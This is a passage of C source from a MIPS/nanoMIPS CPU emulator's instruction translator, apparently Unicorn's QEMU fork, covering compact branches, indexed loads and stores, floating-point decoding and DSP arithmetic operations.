uint32_t opc, int rs, int rt, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int bcond_compute = 0; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); /* Load needed operands and calculate btarget */ switch (opc) { /* compact branch */ case OPC_BGEC: case OPC_BLTC: gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); bcond_compute = 1; ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); break; case OPC_BGEUC: case OPC_BLTUC: if (rs == 0 || rs == rt) { /* OPC_BLEZALC, OPC_BGEZALC */ /* OPC_BGTZALC, OPC_BLTZALC */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + 4); } gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); bcond_compute = 1; ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); break; case OPC_BC: ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); break; case OPC_BEQZC: if (rs != 0) { /* OPC_BEQZC, OPC_BNEZC */ gen_load_gpr(tcg_ctx, t0, rs); bcond_compute = 1; ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); } else { /* OPC_JIC, OPC_JIALC */ TCGv tbase = tcg_temp_new(tcg_ctx); TCGv toffset = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, tbase, rt); tcg_gen_movi_tl(tcg_ctx, toffset, offset); gen_op_addr_add(ctx, tcg_ctx->btarget, tbase, toffset); tcg_temp_free(tcg_ctx, tbase); tcg_temp_free(tcg_ctx, toffset); } break; default: MIPS_INVAL("Compact branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } if (bcond_compute == 0) { /* Uncoditional compact branch */ switch (opc) { case OPC_BC: gen_goto_tb(ctx, 0, ctx->btarget); break; default: MIPS_INVAL("Compact branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } } else { /* Conditional compact branch */ TCGLabel *fs = gen_new_label(tcg_ctx); switch (opc) { case OPC_BGEUC: if (rs == 0 && rt != 0) { /* OPC_BLEZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LE), t1, 0, fs); } else if (rs != 0 && rt != 0 && rs == rt) { /* OPC_BGEZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t1, 0, fs); } else { /* OPC_BGEUC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GEU), t0, t1, fs); } break; case OPC_BLTUC: if (rs == 0 && rt != 0) { /* OPC_BGTZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GT), t1, 0, fs); } else if (rs != 0 && rt != 0 && rs == rt) { /* OPC_BLTZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t1, 0, fs); } else { /* OPC_BLTUC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LTU), t0, t1, fs); } break; case OPC_BGEC: if (rs == 0 && rt != 0) { /* OPC_BLEZC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LE), t1, 0, fs); } else if (rs != 0 && rt != 0 && rs == rt) { /* OPC_BGEZC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t1, 0, fs); } else { /* OPC_BGEC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t0, t1, fs); } break; case OPC_BLTC: if (rs == 0 && rt != 0) { /* OPC_BGTZC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GT), t1, 0, fs); } else if (rs != 0 && rt != 0 && rs == rt) { /* OPC_BLTZC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t1, 0, fs); } else { /* OPC_BLTC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t0, t1, fs); } break; case OPC_BEQZC: tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_EQ), t0, 0, fs); break; default: MIPS_INVAL("Compact conditional branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } /* branch completion */ clear_branch_hflags(ctx); ctx->base.is_jmp = DISAS_NORETURN; /* Generating branch here as compact branches don't have delay slot */ gen_goto_tb(ctx, 1, ctx->btarget); gen_set_label(tcg_ctx, fs); gen_goto_tb(ctx, 0, ctx->base.pc_next + 4); } out: tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* nanoMIPS CP1 Branches */ static void gen_compute_branch_cp1_nm(DisasContext *ctx, uint32_t op, int32_t ft, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_ulong btarget; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, t0, ft); tcg_gen_andi_i64(tcg_ctx, t0, t0, 1); btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); switch (op) { case NM_BC1EQZC: tcg_gen_xori_i64(tcg_ctx, t0, t0, 1); ctx->hflags |= MIPS_HFLAG_BC; break; case NM_BC1NEZC: /* t0 already set */ ctx->hflags |= MIPS_HFLAG_BC; break; default: MIPS_INVAL("cp1 cond branch"); generate_exception_end(ctx, EXCP_RI); goto out; } tcg_gen_trunc_i64_tl(tcg_ctx, tcg_ctx->bcond, t0); ctx->btarget = btarget; out: tcg_temp_free_i64(tcg_ctx, t0); } static void gen_p_lsx(DisasContext *ctx, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); if ((extract32(ctx->opcode, 6, 1)) == 1) { /* PP.LSXS instructions require shifting */ switch (extract32(ctx->opcode, 7, 4)) { case NM_SHXS: check_nms(ctx); /* fall through */ case NM_LHXS: case NM_LHUXS: tcg_gen_shli_tl(tcg_ctx, t0, t0, 1); break; case NM_SWXS: check_nms(ctx); /* fall through */ case NM_LWXS: case NM_LWC1XS: case NM_SWC1XS: tcg_gen_shli_tl(tcg_ctx, t0, t0, 2); break; case NM_LDC1XS: case NM_SDC1XS: tcg_gen_shli_tl(tcg_ctx, t0, t0, 3); break; } } gen_op_addr_add(ctx, t0, t0, t1); switch (extract32(ctx->opcode, 7, 4)) { case NM_LBX: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_SB); gen_store_gpr(tcg_ctx, t0, rd); break; case NM_LHX: /*case NM_LHXS:*/ tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TESW); gen_store_gpr(tcg_ctx, t0, rd); break; case NM_LWX: /*case NM_LWXS:*/ tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TESL); gen_store_gpr(tcg_ctx, t0, rd); break; case NM_LBUX: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_UB); gen_store_gpr(tcg_ctx, t0, rd); break; case NM_LHUX: /*case NM_LHUXS:*/ tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TEUW); gen_store_gpr(tcg_ctx, t0, rd); break; case NM_SBX: check_nms(ctx); gen_load_gpr(tcg_ctx, t1, rd); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_8); break; case NM_SHX: /*case NM_SHXS:*/ check_nms(ctx); gen_load_gpr(tcg_ctx, t1, rd); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUW); break; case NM_SWX: /*case NM_SWXS:*/ check_nms(ctx); gen_load_gpr(tcg_ctx, t1, rd); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); break; case NM_LWC1X: /*case NM_LWC1XS:*/ case NM_LDC1X: /*case NM_LDC1XS:*/ case NM_SWC1X: /*case NM_SWC1XS:*/ case NM_SDC1X: /*case NM_SDC1XS:*/ if (ctx->CP0_Config1 & (1 << CP0C1_FP)) { check_cp1_enabled(ctx); switch (extract32(ctx->opcode, 7, 4)) { case NM_LWC1X: /*case NM_LWC1XS:*/ gen_flt_ldst(ctx, OPC_LWC1, rd, t0); break; case NM_LDC1X: /*case NM_LDC1XS:*/ gen_flt_ldst(ctx, OPC_LDC1, rd, t0); break; case NM_SWC1X: /*case NM_SWC1XS:*/ gen_flt_ldst(ctx, OPC_SWC1, rd, t0); break; case NM_SDC1X: /*case NM_SDC1XS:*/ gen_flt_ldst(ctx, OPC_SDC1, rd, t0); break; } } else { generate_exception_err(ctx, EXCP_CpU, 1); } break; default: generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void gen_pool32f_nanomips_insn(DisasContext *ctx) { int rt, rs, rd; rt = extract32(ctx->opcode, 21, 5); rs = extract32(ctx->opcode, 16, 5); rd = extract32(ctx->opcode, 11, 5); if (!(ctx->CP0_Config1 & (1 << CP0C1_FP))) { generate_exception_end(ctx, EXCP_RI); return; } check_cp1_enabled(ctx); switch (extract32(ctx->opcode, 0, 3)) { case NM_POOL32F_0: switch (extract32(ctx->opcode, 3, 7)) { case NM_RINT_S: gen_farith(ctx, OPC_RINT_S, 0, rt, rs, 0); break; case NM_RINT_D: gen_farith(ctx, OPC_RINT_D, 0, rt, rs, 0); break; case NM_CLASS_S: gen_farith(ctx, OPC_CLASS_S, 0, rt, rs, 0); break; case NM_CLASS_D: gen_farith(ctx, OPC_CLASS_D, 0, rt, rs, 0); break; case NM_ADD_S: gen_farith(ctx, OPC_ADD_S, rt, rs, rd, 0); break; case NM_ADD_D: gen_farith(ctx, OPC_ADD_D, rt, rs, rd, 0); break; case NM_SUB_S: gen_farith(ctx, OPC_SUB_S, rt, rs, rd, 0); break; case NM_SUB_D: gen_farith(ctx, OPC_SUB_D, rt, rs, rd, 0); break; case NM_MUL_S: gen_farith(ctx, OPC_MUL_S, rt, rs, rd, 0); break; case NM_MUL_D: gen_farith(ctx, OPC_MUL_D, rt, rs, rd, 0); break; case NM_DIV_S: gen_farith(ctx, OPC_DIV_S, rt, rs, rd, 0); break; case NM_DIV_D: gen_farith(ctx, OPC_DIV_D, rt, rs, rd, 0); break; case NM_SELEQZ_S: gen_sel_s(ctx, OPC_SELEQZ_S, rd, rt, rs); break; case NM_SELEQZ_D: gen_sel_d(ctx, OPC_SELEQZ_D, rd, rt, rs); break; case NM_SELNEZ_S: gen_sel_s(ctx, OPC_SELNEZ_S, rd, rt, rs); break; case NM_SELNEZ_D: gen_sel_d(ctx, OPC_SELNEZ_D, rd, rt, rs); break; case NM_SEL_S: gen_sel_s(ctx, OPC_SEL_S, rd, rt, rs); break; case NM_SEL_D: gen_sel_d(ctx, OPC_SEL_D, rd, rt, rs); break; case NM_MADDF_S: gen_farith(ctx, OPC_MADDF_S, rt, rs, rd, 0); break; case NM_MADDF_D: gen_farith(ctx, OPC_MADDF_D, rt, rs, rd, 0); break; case NM_MSUBF_S: gen_farith(ctx, OPC_MSUBF_S, rt, rs, rd, 0); break; case NM_MSUBF_D: gen_farith(ctx, OPC_MSUBF_D, rt, rs, rd, 0); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32F_3: switch (extract32(ctx->opcode, 3, 3)) { case NM_MIN_FMT: switch (extract32(ctx->opcode, 9, 1)) { case FMT_SDPS_S: gen_farith(ctx, OPC_MIN_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MIN_D, rt, rs, rd, 0); break; } break; case NM_MAX_FMT: switch (extract32(ctx->opcode, 9, 1)) { case FMT_SDPS_S: gen_farith(ctx, OPC_MAX_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MAX_D, rt, rs, rd, 0); break; } break; case NM_MINA_FMT: switch (extract32(ctx->opcode, 9, 1)) { case FMT_SDPS_S: gen_farith(ctx, OPC_MINA_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MINA_D, rt, rs, rd, 0); break; } break; case NM_MAXA_FMT: switch (extract32(ctx->opcode, 9, 1)) { case FMT_SDPS_S: gen_farith(ctx, OPC_MAXA_S, rt, rs, rd, 0); break; case FMT_SDPS_D: gen_farith(ctx, OPC_MAXA_D, rt, rs, rd, 0); break; } break; case NM_POOL32FXF: switch (extract32(ctx->opcode, 6, 8)) { case NM_CFC1: gen_cp1(ctx, OPC_CFC1, rt, rs); break; case NM_CTC1: gen_cp1(ctx, OPC_CTC1, rt, rs); break; case NM_MFC1: gen_cp1(ctx, OPC_MFC1, rt, rs); break; case NM_MTC1: gen_cp1(ctx, OPC_MTC1, rt, rs); break; case NM_MFHC1: gen_cp1(ctx, OPC_MFHC1, rt, rs); break; case NM_MTHC1: gen_cp1(ctx, OPC_MTHC1, rt, rs); break; case NM_CVT_S_PL: gen_farith(ctx, OPC_CVT_S_PL, -1, rs, rt, 0); break; case NM_CVT_S_PU: gen_farith(ctx, OPC_CVT_S_PU, -1, rs, rt, 0); break; default: switch (extract32(ctx->opcode, 6, 9)) { case NM_CVT_L_S: gen_farith(ctx, OPC_CVT_L_S, -1, rs, rt, 0); break; case NM_CVT_L_D: gen_farith(ctx, OPC_CVT_L_D, -1, rs, rt, 0); break; case NM_CVT_W_S: gen_farith(ctx, OPC_CVT_W_S, -1, rs, rt, 0); break; case NM_CVT_W_D: gen_farith(ctx, OPC_CVT_W_D, -1, rs, rt, 0); break; case NM_RSQRT_S: gen_farith(ctx, OPC_RSQRT_S, -1, rs, rt, 0); break; case NM_RSQRT_D: gen_farith(ctx, OPC_RSQRT_D, -1, rs, rt, 0); break; case NM_SQRT_S: gen_farith(ctx, OPC_SQRT_S, -1, rs, rt, 0); break; case NM_SQRT_D: gen_farith(ctx, OPC_SQRT_D, -1, rs, rt, 0); break; case NM_RECIP_S: gen_farith(ctx, OPC_RECIP_S, -1, rs, rt, 0); break; case NM_RECIP_D: gen_farith(ctx, OPC_RECIP_D, -1, rs, rt, 0); break; case NM_FLOOR_L_S: gen_farith(ctx, OPC_FLOOR_L_S, -1, rs, rt, 0); break; case NM_FLOOR_L_D: gen_farith(ctx, OPC_FLOOR_L_D, -1, rs, rt, 0); break; case NM_FLOOR_W_S: gen_farith(ctx, OPC_FLOOR_W_S, -1, rs, rt, 0); break; case NM_FLOOR_W_D: gen_farith(ctx, OPC_FLOOR_W_D, -1, rs, rt, 0); break; case NM_CEIL_L_S: gen_farith(ctx, OPC_CEIL_L_S, -1, rs, rt, 0); break; case NM_CEIL_L_D: gen_farith(ctx, OPC_CEIL_L_D, -1, rs, rt, 0); break; case NM_CEIL_W_S: gen_farith(ctx, OPC_CEIL_W_S, -1, rs, rt, 0); break; case NM_CEIL_W_D: gen_farith(ctx, OPC_CEIL_W_D, -1, rs, rt, 0); break; case NM_TRUNC_L_S: gen_farith(ctx, OPC_TRUNC_L_S, -1, rs, rt, 0); break; case NM_TRUNC_L_D: gen_farith(ctx, OPC_TRUNC_L_D, -1, rs, rt, 0); break; case NM_TRUNC_W_S: gen_farith(ctx, OPC_TRUNC_W_S, -1, rs, rt, 0); break; case NM_TRUNC_W_D: gen_farith(ctx, OPC_TRUNC_W_D, -1, rs, rt, 0); break; case NM_ROUND_L_S: gen_farith(ctx, OPC_ROUND_L_S, -1, rs, rt, 0); break; case NM_ROUND_L_D: gen_farith(ctx, OPC_ROUND_L_D, -1, rs, rt, 0); break; case NM_ROUND_W_S: gen_farith(ctx, OPC_ROUND_W_S, -1, rs, rt, 0); break; case NM_ROUND_W_D: gen_farith(ctx, OPC_ROUND_W_D, -1, rs, rt, 0); break; case NM_MOV_S: gen_farith(ctx, OPC_MOV_S, -1, rs, rt, 0); break; case NM_MOV_D: gen_farith(ctx, OPC_MOV_D, -1, rs, rt, 0); break; case NM_ABS_S: gen_farith(ctx, OPC_ABS_S, -1, rs, rt, 0); break; case NM_ABS_D: gen_farith(ctx, OPC_ABS_D, -1, rs, rt, 0); break; case NM_NEG_S: gen_farith(ctx, OPC_NEG_S, -1, rs, rt, 0); break; case NM_NEG_D: gen_farith(ctx, OPC_NEG_D, -1, rs, rt, 0); break; case NM_CVT_D_S: gen_farith(ctx, OPC_CVT_D_S, -1, rs, rt, 0); break; case NM_CVT_D_W: gen_farith(ctx, OPC_CVT_D_W, -1, rs, rt, 0); break; case NM_CVT_D_L: gen_farith(ctx, OPC_CVT_D_L, -1, rs, rt, 0); break; case NM_CVT_S_D: gen_farith(ctx, OPC_CVT_S_D, -1, rs, rt, 0); break; case NM_CVT_S_W: gen_farith(ctx, OPC_CVT_S_W, -1, rs, rt, 0); break; case NM_CVT_S_L: gen_farith(ctx, OPC_CVT_S_L, -1, rs, rt, 0); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; } break; } break; case NM_POOL32F_5: switch (extract32(ctx->opcode, 3, 3)) { case NM_CMP_CONDN_S: gen_r6_cmp_s(ctx, extract32(ctx->opcode, 6, 5), rt, rs, rd); break; case NM_CMP_CONDN_D: gen_r6_cmp_d(ctx, extract32(ctx->opcode, 6, 5), rt, rs, rd); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; default: generate_exception_end(ctx, EXCP_RI); break; } } static void gen_pool32a5_nanomips_insn(DisasContext *ctx, int opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ret = rd; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv v1_t = tcg_temp_new(tcg_ctx); TCGv v2_t = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, v1_t, rs); gen_load_gpr(tcg_ctx, v2_t, rt); switch (opc) { case NM_CMP_EQ_PH: check_dsp(ctx); gen_helper_cmp_eq_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case NM_CMP_LT_PH: check_dsp(ctx); gen_helper_cmp_lt_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case NM_CMP_LE_PH: check_dsp(ctx); gen_helper_cmp_le_ph(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case NM_CMPU_EQ_QB: check_dsp(ctx); gen_helper_cmpu_eq_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case NM_CMPU_LT_QB: check_dsp(ctx); gen_helper_cmpu_lt_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case NM_CMPU_LE_QB: check_dsp(ctx); gen_helper_cmpu_le_qb(tcg_ctx, v1_t, v2_t, tcg_ctx->cpu_env); break; case NM_CMPGU_EQ_QB: check_dsp(ctx); gen_helper_cmpgu_eq_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_CMPGU_LT_QB: check_dsp(ctx); gen_helper_cmpgu_lt_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_CMPGU_LE_QB: check_dsp(ctx); gen_helper_cmpgu_le_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_CMPGDU_EQ_QB: check_dsp_r2(ctx); gen_helper_cmpgu_eq_qb(tcg_ctx, v1_t, v1_t, v2_t); tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, v1_t, 24, 4); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_CMPGDU_LT_QB: check_dsp_r2(ctx); gen_helper_cmpgu_lt_qb(tcg_ctx, v1_t, v1_t, v2_t); tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, v1_t, 24, 4); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_CMPGDU_LE_QB: check_dsp_r2(ctx); gen_helper_cmpgu_le_qb(tcg_ctx, v1_t, v1_t, v2_t); tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_dspctrl, tcg_ctx->cpu_dspctrl, v1_t, 24, 4); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_PACKRL_PH: check_dsp(ctx); gen_helper_packrl_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_PICK_QB: check_dsp(ctx); gen_helper_pick_qb(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_PICK_PH: check_dsp(ctx); gen_helper_pick_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_ADDQ_S_W: check_dsp(ctx); gen_helper_addq_s_w(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SUBQ_S_W: check_dsp(ctx); gen_helper_subq_s_w(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_ADDSC: check_dsp(ctx); gen_helper_addsc(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_ADDWC: check_dsp(ctx); gen_helper_addwc(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_ADDQ_S_PH: check_dsp(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* ADDQ_PH */ gen_helper_addq_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* ADDQ_S_PH */ gen_helper_addq_s_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_ADDQH_R_PH: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* ADDQH_PH */ gen_helper_addqh_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* ADDQH_R_PH */ gen_helper_addqh_r_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_ADDQH_R_W: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* ADDQH_W */ gen_helper_addqh_w(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* ADDQH_R_W */ gen_helper_addqh_r_w(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_ADDU_S_QB: check_dsp(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* ADDU_QB */ gen_helper_addu_qb(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* ADDU_S_QB */ gen_helper_addu_s_qb(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_ADDU_S_PH: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* ADDU_PH */ gen_helper_addu_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* ADDU_S_PH */ gen_helper_addu_s_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_ADDUH_R_QB: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* ADDUH_QB */ gen_helper_adduh_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* ADDUH_R_QB */ gen_helper_adduh_r_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SHRAV_R_PH: check_dsp(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SHRAV_PH */ gen_helper_shra_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SHRAV_R_PH */ gen_helper_shra_r_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SHRAV_R_QB: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SHRAV_QB */ gen_helper_shra_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SHRAV_R_QB */ gen_helper_shra_r_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SUBQ_S_PH: check_dsp(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SUBQ_PH */ gen_helper_subq_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SUBQ_S_PH */ gen_helper_subq_s_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SUBQH_R_PH: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SUBQH_PH */ gen_helper_subqh_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SUBQH_R_PH */ gen_helper_subqh_r_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SUBQH_R_W: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SUBQH_W */ gen_helper_subqh_w(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SUBQH_R_W */ gen_helper_subqh_r_w(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SUBU_S_QB: check_dsp(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SUBU_QB */ gen_helper_subu_qb(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SUBU_S_QB */ gen_helper_subu_s_qb(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SUBU_S_PH: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SUBU_PH */ gen_helper_subu_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SUBU_S_PH */ gen_helper_subu_s_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SUBUH_R_QB: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SUBUH_QB */ gen_helper_subuh_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SUBUH_R_QB */ gen_helper_subuh_r_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SHLLV_S_PH: check_dsp(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SHLLV_PH */ gen_helper_shll_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SHLLV_S_PH */ gen_helper_shll_s_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_PRECR_SRA_R_PH_W: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* PRECR_SRA_PH_W */ { TCGv_i32 sa_t = tcg_const_i32(tcg_ctx, rd); gen_helper_precr_sra_ph_w(tcg_ctx, v1_t, sa_t, v1_t, tcg_ctx->cpu_gpr[rt]); gen_store_gpr(tcg_ctx, v1_t, rt); tcg_temp_free_i32(tcg_ctx, sa_t); } break; case 1: /* PRECR_SRA_R_PH_W */ { TCGv_i32 sa_t = tcg_const_i32(tcg_ctx, rd); gen_helper_precr_sra_r_ph_w(tcg_ctx, v1_t, sa_t, v1_t, tcg_ctx->cpu_gpr[rt]); gen_store_gpr(tcg_ctx, v1_t, rt); tcg_temp_free_i32(tcg_ctx, sa_t); } break; } break; case NM_MULEU_S_PH_QBL: check_dsp(ctx); gen_helper_muleu_s_ph_qbl(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_MULEU_S_PH_QBR: check_dsp(ctx); gen_helper_muleu_s_ph_qbr(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_MULQ_RS_PH: check_dsp(ctx); 